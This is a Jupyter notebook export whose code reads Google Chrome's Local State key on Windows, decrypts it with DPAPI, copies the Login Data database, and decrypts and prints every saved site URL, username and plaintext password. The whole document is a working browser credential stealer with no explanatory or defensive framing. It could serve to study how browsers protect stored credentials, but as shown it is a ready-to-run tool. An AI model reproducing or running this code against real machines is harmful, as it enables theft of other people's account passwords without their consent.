In [30]:
pwd


'C:\\Users\\Shreya'

In [31]:
import os
import json
import base64
import sqlite3
import win32crypt

In [32]:
from Crypto.Cipher import AES
import shutil
from datetime import timezone, datetime, timedelta

In [33]:
def chrome_datetime(chrome_data):
    # Convert a Chrome timestamp to a Python datetime object.
    return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)

In [34]:
def get_encryption_key():
    # Read the Chrome Local State file to obtain the encryption key.
    local_state_path = os.path.join(
        os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
        "User Data", "Local State")
    
    with open(local_state_path, "r", encoding="utf-8") as f:
        local_state_data = f.read()
        local_state_data = json.loads(local_state_data)

    # Decode the base64-encoded encryption key.
    encrypted_key = base64.b64decode(
        local_state_data["os_crypt"]["encrypted_key"])
    
    # Remove the Windows Data Protection API (DPAPI) prefix.
    encrypted_key = encrypted_key[5:]
    
    # Decrypt and return the key.
    return win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]

def decrypt_password(encrypted_password, encryption_key):
    try:
        # Extract the initialization vector (IV) and encrypted password.
        iv = encrypted_password[3:15]
        encrypted_password = encrypted_password[15:]
        
        # Create an AES cipher for decryption.
        cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
        
        # Decrypt the password and remove padding.
        return cipher.decrypt(encrypted_password)[:-16].decode()
    except:
        try:
            # Attempt to decrypt using Windows CryptUnprotectData.
            return str(win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1])
        except:
            # If decryption fails, return a message indicating no passwords were found.
            return "No Passwords"


In [35]:
def main():
    # Obtain the encryption key from the Chrome Local State file.
    encryption_key = get_encryption_key()
    
    # Path to the Chrome login data database.
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                        "Google", "Chrome", "User Data", "default", "Login Data")
    
    # Filename for the copied database.
    output_filename = "ChromePasswords.db"
    
    # Create a copy of the Chrome login data database.
    shutil.copyfile(db_path, output_filename)
    
    # Connect to the copied database.
    db = sqlite3.connect(output_filename)
    cursor = db.cursor()
    
    # Execute a query to retrieve login data.
    cursor.execute(
        "SELECT origin_url, action_url, username_value, password_value, date_created, date_last_used FROM logins "
        "ORDER BY date_last_used")
    
    # Iterate over the retrieved login data.
    for row in cursor.fetchall():
        main_url = row[0]
        login_url = row[1]
        username = row[2]
        
        # Decrypt the password using the encryption key.
        decrypted_password = decrypt_password(row[3], encryption_key)
        
        creation_date = row[4]
        last_usage = row[5]
        
        # Display login information.
        if username or decrypted_password:
            print(f"Main URL: {main_url}")
            print(f"Login URL: {login_url}")
            print(f"Username: {username}")
            print(f"Decrypted Password: {decrypted_password}")
        
        # Display creation date if available.
        if creation_date != 86400000000 and creation_date:
            print(f"Creation Date: {str(chrome_datetime(creation_date))}")
        
        # Display last usage date if available.
        if last_usage != 86400000000 and last_usage:
            print(f"Last Used: {str(chrome_datetime(last_usage))}")
        
        print("=" * 100)
    
    # Close the database connection.
    cursor.close()
    db.close()
    
    try:
        # Try to remove the copied database file.
        os.remove(output_filename)
    except:
        pass

In [ ]:

if __name__ == "__main__":
    main()